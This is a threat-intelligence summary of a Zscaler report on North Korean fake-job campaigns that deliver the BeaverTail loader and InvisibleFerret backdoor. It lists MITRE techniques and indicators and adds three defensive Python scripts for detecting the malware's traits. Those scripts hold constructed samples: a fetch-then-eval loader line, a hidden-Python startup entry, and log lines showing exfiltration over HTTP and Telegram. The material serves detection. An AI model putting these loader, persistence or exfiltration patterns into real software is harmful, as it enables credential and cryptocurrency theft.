“North Korean Remote Workers: Bridging Pyongyang and Western Payrolls”

North Korean actors used the Contagious Interview and WageMole campaigns to obtain remote jobs and steal sensitive data from developers by delivering obfuscated JavaScript and Python payloads. Their toolset (BeaverTail and InvisibleFerret) now supports Windows and macOS installers, dynamic payload loading, and exfiltration via HTTP and Telegram. #ContagiousInterview #InvisibleFerret

Keypoints

  • Attackers use fake job postings and code challenges to deliver a malicious JavaScript (BeaverTail) that boots a Python backdoor (InvisibleFerret).
  • BeaverTail uses javascript-obfuscator and dynamic loading (fetch + eval) to evade detection and retrieve additional code from attacker servers.
  • InvisibleFerret runs on multiple OSes, performs keylogging, browser and wallet theft, targeted file discovery, and configurable exfiltration.
  • Exfiltration channels include HTTP /uploads endpoints and Telegram uploads; FTP was used historically but has been removed in newer builds.
  • InvisibleFerret supports OS-specific persistence (Windows batch in Startup, macOS LaunchAgent plist, Linux .desktop entry) and AnyDesk-related commands for remote access.
  • Campaign delivered via malicious NPM packages, Windows installers, and macOS application bundles, leading to widespread infections and source-code/cryptocurrency theft.

MITRE Techniques

  • [T1566.003] Phishing: Spearphishing via Service – The attacker initiates contact and lures victims through social media or job platforms. (‘The threat actor connected with the victim through social media or job application platforms.’)
  • [T1059.007] Command and Scripting Interpreter: JavaScript – BeaverTail executes malicious JavaScript as the initial infection stage. (‘The malicious JavaScript, known as BeaverTail, is used during the initial stage of infection.’)
  • [T1059.006] Command and Scripting Interpreter: Python – InvisibleFerret is a Python backdoor used in intermediate and final stages to perform data collection and exfiltration. (‘The malicious Python script, known as InvisibleFerret, is used during the intermediate and final stage of infection.’)
  • [T1204.002] User Execution: Malicious File – Victims are tricked into executing compromised NPM packages or installers disguised as legitimate applications. (‘The threat actor tricked the victim into executing compromised NPM packages or installation files.’)
  • [T1027.013] Obfuscated Files or Information: Encrypted/Encoded File – Both BeaverTail and InvisibleFerret are heavily obfuscated to hinder analysis. (‘BeaverTail and InvisibleFerret are heavily obfuscated.’)
  • [T1555.003] Credentials from Password Stores: Credentials from Web Browsers – The malware targets browser-stored credentials and cryptocurrency wallet data. (‘One of the primary objectives of the malware is to steal sensitive data stored in the victim’s browser, including cryptocurrency wallets.’)
  • [T1083] File and Directory Discovery – InvisibleFerret searches specific files and directories to identify valuable targets and exfiltrate sensitive files. (‘Using InvisibleFerret, the threat actor searches specific files to verify the victim and exfiltrate sensitive files.’)
  • [T1082] System Information Discovery – Malicious scripts collect and send general system information from compromised hosts. (‘Malicious scripts used in the Contagious Interview campaign are responsible for sending general information from the victim.’)
  • [T1560.001] Archive Collected Data: Archive via Utility – Some InvisibleFerret variants compress and encrypt stolen data (7z/zip/RAR) before exfiltration. (‘Specific version of InvisibleFerret that sends stolen data using the RAR utility.’)
  • [T1005] Data from Local System – The backdoor searches and uploads interesting local files such as source code and documents. (‘Search interesting files from the victim host and exfiltrate.’)
  • [T1071.001] Application Layer Protocol: Web Protocols – InvisibleFerret uploads stolen data over HTTP using endpoints like /uploads. (‘Through InvisibleFerret, sends sensitive data over the HTTP protocol.’)
  • [T1071.002] Application Layer Protocol: File Transfer Protocols – Earlier versions used FTP for file uploads (historical behavior). (‘Through InvisibleFerret, sends sensitive data over the FTP protocol.’)
  • [T1041] Exfiltration Over C2 Channel – Depending on commands, data can be exfiltrated over C2 channels controlled by the attacker. (‘Depending on backdoor commands, exfiltrates stolen data over the C2 channel.’)

Indicators of Compromise

  • [GitHub repositories] Campaign IOCs and malicious artifacts – https://github.com/ThreatLabz/iocs/tree/main/contagiousinterview, https://github.com/ThreatLabz/iocs/tree/main/wagemole
  • [LinkedIn profiles] Fake recruiter/developer profiles used for targeting – hxxps://www.linkedin[.]com/in/frank-schoneberg-a089832a4/, hxxps://www.linkedin[.]com/in/logan-collins-374404306
  • [Endpoint URIs] Payload and exfiltration endpoints used by the actors – /payload, /bow, /uploads
  • [File paths & startup artifacts] Persistence and remote-access artifacts observed – C:/Program Files (x86)/AnyDesk/AnyDesk.exe, com.avatar.update.wake.plist (and queue.bat startup script)
  • [Malicious script names] Primary payload identifiers observed on victims – BeaverTail (malicious JavaScript), InvisibleFerret (Python backdoor)


The Contagious Interview infection chain begins with social-engineered job postings that lure developers into executing supplied artifacts—historically a malicious NPM package, but also Windows installers and macOS application bundles. The NPM-delivered JavaScript loader, BeaverTail, is obfuscated with javascript-obfuscator and can dynamically fetch additional code from attacker-controlled servers; in some cases it extracts a cookie field from fetched JSON and executes it via eval to run further malicious payloads. BeaverTail’s primary role is to retrieve and launch a Python backdoor (InvisibleFerret) from endpoints such as /payload and /bow.
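The loader traits described above (javascript-obfuscator output, a fetch-then-eval chain that pulls a `cookie` field out of fetched JSON, and the `/payload` and `/bow` paths) can be turned into a static triage pass over the files of a suspect NPM package before anyone runs them. The script below is an added example, not code from the Zscaler write-up or from the campaign itself; the sample JavaScript is constructed to have the shape the article describes, and the scoring weights and thresholds are this example's own choices.

```python
"""Static triage of JavaScript from an NPM package for BeaverTail-like traits.

Added example; the heuristics mirror the article's description of the loader
(javascript-obfuscator style, fetch()+eval(), 'cookie' field, /payload and
/bow endpoint paths). Sample scripts are constructed; weights are assumed.
"""
import re
from dataclasses import dataclass, field

# Endpoint paths named in the article; everything else here is heuristic.
KNOWN_ENDPOINTS = ("/payload", "/bow", "/uploads")

# javascript-obfuscator renames identifiers to _0x<hex> and packs string
# literals into a large array that a decoder function indexes at runtime.
HEX_IDENT = re.compile(r"\b_0x[0-9a-f]{4,}\b")
STRING_ARRAY = re.compile(r"\[\s*(?:['\"][^'\"]*['\"]\s*,\s*){8,}['\"][^'\"]*['\"]\s*\]")
# The article describes fetched content reaching eval(); look for both in one
# file, plus code that reads a 'cookie' field from the parsed response.
FETCH_CALL = re.compile(r"\bfetch\s*\(")
EVAL_CALL = re.compile(r"\beval\s*\(|new\s+Function\s*\(")
COOKIE_FIELD = re.compile(r"\.cookie\b|\[\s*['\"]cookie['\"]\s*\]")


@dataclass
class Finding:
    path: str
    score: int = 0
    reasons: list = field(default_factory=list)


def triage_script(path: str, source: str) -> Finding:
    """Score one JavaScript file; a higher score means more loader-like."""
    f = Finding(path)
    if len(HEX_IDENT.findall(source)) >= 10:
        f.score += 2
        f.reasons.append("javascript-obfuscator style _0x identifiers")
    if STRING_ARRAY.search(source):
        f.score += 2
        f.reasons.append("packed string array")
    if FETCH_CALL.search(source) and EVAL_CALL.search(source):
        f.score += 3
        f.reasons.append("fetch() and eval()/Function() in the same file")
        if COOKIE_FIELD.search(source):
            f.score += 2
            f.reasons.append("reads a 'cookie' field from fetched data")
    for ep in KNOWN_ENDPOINTS:
        if ep in source:
            f.score += 2
            f.reasons.append(f"references endpoint path {ep}")
    return f


def triage_package(files: dict) -> list:
    """Triage every .js file in a {path: source} mapping, highest score first."""
    results = [triage_script(p, s) for p, s in files.items() if p.endswith(".js")]
    return sorted(results, key=lambda r: r.score, reverse=True)


# Constructed samples: a benign helper and a file shaped like the article's
# description of the loader (no real malware code is reproduced here).
SAMPLE_PACKAGE = {
    "lib/util.js": "export function add(a, b) { return a + b; }\n",
    "lib/loader.js": (
        "var " + ", ".join(f"_0x{i:04x}=0" for i in range(12)) + ";\n"
        "var _0xabcd=['a','b','c','d','e','f','g','h','i','j'];\n"
        "fetch(BASE + '/payload').then(r => r.json())"
        ".then(j => eval(j.cookie));\n"
    ),
}

if __name__ == "__main__":
    for r in triage_package(SAMPLE_PACKAGE):
        print(f"{r.path}: score={r.score} {r.reasons}")
```

Run it over an unpacked tarball (`npm pack` output) before installing: a high score is a reason to detonate the package in a sandbox rather than proof of compromise, since minified but legitimate libraries also produce dense identifier renaming.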

InvisibleFerret is a multi-component Python backdoor that establishes persistence tailored per OS (Windows Startup batch, macOS LaunchAgent plist, GNOME .desktop entry for Linux) and spawns a dedicated keylogging thread that monitors active windows and clipboard activity. Its modular command set permits reconnaissance (AP, AQ), targeted data collection (sdira, sdir, sfile, sfind*), and specialized browser/cryptocurrency artifact theft (ssh_zcp, AA, AO), including copying wallet extension data and app-specific directories. Operators can also modify AnyDesk configuration values (AC) and check for AnyDesk installation (Ab) to enable additional remote access.
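The per-OS persistence locations above are a natural hunting surface: a Windows Startup batch file, a macOS LaunchAgent plist, or a Linux `.desktop` autostart entry that launches a Python interpreter on a script hidden in a temp or dotfile directory stands out on a developer workstation. The scanner below is an added example, not code from the article or the malware; it checks entries against the two artifact names the article reports (`queue.bat`, `com.avatar.update.wake.plist`) and against a generic "Python from an odd path" heuristic that is this example's own assumption. All entry contents and paths are constructed.

```python
"""Hunt for InvisibleFerret-style autostart entries across Windows, macOS, Linux.

Added example. KNOWN_NAMES come from the article's indicators; the
"python from a temp/hidden directory" heuristic and every sample entry
below are constructed for this demonstration.
"""
import os
import plistlib
import re

# Artifact names taken from the article's indicators of compromise.
KNOWN_NAMES = {"queue.bat", "com.avatar.update.wake.plist"}

PYTHON_RE = re.compile(r"\bpython(?:3(?:\.\d+)?|w)?(?:\.exe)?\b", re.I)
# Assumed heuristic: persisted script living under a temp or dotfile directory.
ODD_DIR_RE = re.compile(r"(?:/tmp/|\\Temp\\|/\.[^/]+/|AppData\\Local\\Temp)", re.I)


def _command_of(path: str, content: str) -> str:
    """Extract the launched command from a plist, .desktop or .bat entry."""
    low = path.lower()
    if low.endswith(".plist"):
        try:
            data = plistlib.loads(content.encode())
        except Exception:
            return content  # unparseable plist: fall back to raw text
        args = data.get("ProgramArguments") or [data.get("Program", "")]
        return " ".join(str(a) for a in args)
    if low.endswith(".desktop"):
        m = re.search(r"^Exec=(.*)$", content, re.M)
        return m.group(1) if m else ""
    return content  # .bat/.cmd: treat the whole script as the command


def _location(path: str) -> str:
    p = path.replace("\\", "/").lower()
    if "/library/launchagents/" in p:
        return "macos-launchagent"
    if "/.config/autostart/" in p:
        return "linux-autostart"
    if "/start menu/programs/startup/" in p:
        return "windows-startup"
    return "other"


def scan_autostart(entries: dict) -> list:
    """Return [(path, location, reasons)] for entries worth a closer look.

    `entries` maps an autostart file path to its text content, so the same
    function works on a live host walk or on collected triage artifacts.
    """
    hits = []
    for path, content in entries.items():
        reasons = []
        name = os.path.basename(path.replace("\\", "/"))
        if name in KNOWN_NAMES:
            reasons.append(f"known artifact name {name}")
        cmd = _command_of(path, content)
        if PYTHON_RE.search(cmd):
            reasons.append("autostart launches a Python interpreter")
            if ODD_DIR_RE.search(cmd):
                reasons.append("script path is in a temp or hidden directory")
        if reasons:
            hits.append((path, _location(path), reasons))
    return hits


# Constructed samples (paths and script names are placeholders, not IoCs).
SUSPECT_PLIST = """<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
<key>Label</key><string>com.avatar.update.wake</string>
<key>ProgramArguments</key><array>
<string>/usr/bin/python3</string><string>/Users/dev/.hidden_example/run.py</string>
</array>
<key>RunAtLoad</key><true/>
</dict></plist>
"""
BENIGN_PLIST = """<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
<key>Label</key><string>com.vendor.sync</string>
<key>ProgramArguments</key><array>
<string>/Applications/Sync.app/Contents/MacOS/sync</string>
</array>
</dict></plist>
"""
SAMPLE_ENTRIES = {
    "C:\\Users\\dev\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\queue.bat":
        "@echo off\r\nstart /b python.exe %LOCALAPPDATA%\\Temp\\.hidden_example\\run.py\r\n",
    "/Users/dev/Library/LaunchAgents/com.avatar.update.wake.plist": SUSPECT_PLIST,
    "/home/dev/.config/autostart/update.desktop":
        "[Desktop Entry]\nType=Application\nName=Update\n"
        "Exec=/usr/bin/python3 /home/dev/.cache/.hidden_example/run.py\n",
    "/Users/dev/Library/LaunchAgents/com.vendor.sync.plist": BENIGN_PLIST,
}

if __name__ == "__main__":
    for path, loc, why in scan_autostart(SAMPLE_ENTRIES):
        print(f"[{loc}] {path}\n    " + "\n    ".join(why))
```

On a live host, build `entries` by reading every file in the three directories for each user profile; the name match gives a high-confidence hit, while the interpreter heuristic is a lower-confidence lead that should be paired with the keylogging and exfiltration indicators described elsewhere in this summary.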

For exfiltration, InvisibleFerret compresses and encrypts collected artifacts using platform-appropriate libraries (py7zr for .7z on Windows, pyzipper/AES Zip with default password on non-Windows) and can send archives via Telegram (token + chat ID) or directly upload files over HTTP to /uploads; FTP was used historically but removed in later builds. The backdoor also supports archive-via-utility variants (RAR) and flexible C2-driven file upload commands, enabling attackers to selectively exfiltrate source code, images, PDFs, browser-stored credentials, and cryptocurrency wallet data from compromised hosts across Windows, macOS, and Linux environments.
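Both exfiltration paths named above leave a footprint in web proxy logs: a POST to a path ending in `/uploads` from a scripted client, or a POST to the Telegram Bot API `sendDocument` method. The detector below is an added example, not code from the article; it runs those two rules (plus a generic large-upload rule) over a constructed, simplified proxy log format, and it deliberately redacts the bot token's secret half before it reaches an alert. The log format, the IP addresses, the size threshold, and the user-agent heuristic are all this example's own assumptions.

```python
"""Flag InvisibleFerret-style exfiltration (HTTP /uploads, Telegram bot) in proxy logs.

Added example. The rules follow the article's exfiltration channels; the
log format, sample lines, LARGE_POST threshold and user-agent heuristic
are constructed for this demonstration.
"""
import re
from urllib.parse import urlsplit

# Constructed line format: ts src method url status bytes_out "user-agent"
LOG_RE = re.compile(
    r'^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<url>\S+) '
    r'(?P<status>\d{3}) (?P<bytes_out>\d+) "(?P<ua>[^"]*)"$'
)
# Telegram Bot API call shape: /bot<numeric id>:<secret>/<method>
TELEGRAM_RE = re.compile(
    r"^/bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]+)/(?P<method>sendDocument|sendMessage)$"
)
SCRIPT_UA_RE = re.compile(r"python-requests|python-urllib|curl/", re.I)
LARGE_POST = 1_000_000  # assumed: request bodies above this are "large"


def parse_line(line: str):
    """Parse one log line into a dict, or return None if it does not fit."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["bytes_out"] = int(rec["bytes_out"])
    parts = urlsplit(rec["url"])
    rec["host"] = parts.hostname or ""
    rec["path"] = parts.path
    return rec


def classify(rec: dict):
    """Return (rule, detail) for a suspicious record, else None."""
    if rec["method"] != "POST":
        return None
    scripted = bool(SCRIPT_UA_RE.search(rec["ua"]))
    if rec["host"] == "api.telegram.org":
        t = TELEGRAM_RE.match(rec["path"])
        if t:
            # Keep the numeric bot id for correlation; never copy the secret.
            return ("telegram-bot-upload",
                    f"bot {t['bot_id']}:*** {t['method']} {rec['bytes_out']} bytes")
    if rec["path"].endswith("/uploads") and (scripted or rec["bytes_out"] > LARGE_POST):
        return ("http-uploads-post",
                f"{rec['host']}{rec['path']} ua={rec['ua']} {rec['bytes_out']} bytes")
    if scripted and rec["bytes_out"] > LARGE_POST:
        return ("large-scripted-upload", f"{rec['host']}{rec['path']} {rec['bytes_out']} bytes")
    return None


def detect(lines) -> list:
    """Run every rule over the log lines; unparseable lines are skipped."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        hit = classify(rec)
        if hit:
            findings.append({"src": rec["src"], "rule": hit[0], "detail": hit[1]})
    return findings


# Constructed log lines (TEST-NET addresses, placeholder token, fake sizes).
SAMPLE_LOG = [
    '2024-05-01T10:00:00Z 10.0.0.5 GET https://registry.npmjs.org/lodash 200 512 "npm/10.2.0 node/v20.11.0"',
    '2024-05-01T10:02:13Z 10.0.0.5 POST https://203.0.113.10/uploads 200 2457600 "python-requests/2.31.0"',
    '2024-05-01T10:02:40Z 10.0.0.5 POST https://api.telegram.org/bot123456789:EXAMPLE_TOKEN_abc/sendDocument 200 1048576 "python-requests/2.31.0"',
    '2024-05-01T10:03:00Z 10.0.0.7 POST https://intranet.example.com/uploads 200 4096 "Mozilla/5.0 (X11; Linux x86_64)"',
    'this line is not in the expected format',
]

if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f"{f['src']} {f['rule']}: {f['detail']}")
```

The fourth sample line shows the caveat: a small browser-driven POST to an internal `/uploads` path is left alone, so the rule keys on the client and the volume rather than on the path name by itself. In a real deployment the Telegram rule is the higher-signal one on developer endpoints, where bot API traffic is rarely legitimate.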

Read more: https://www.zscaler.com/blogs/security-research/pyongyang-your-payroll-rise-north-korean-remote-workers-west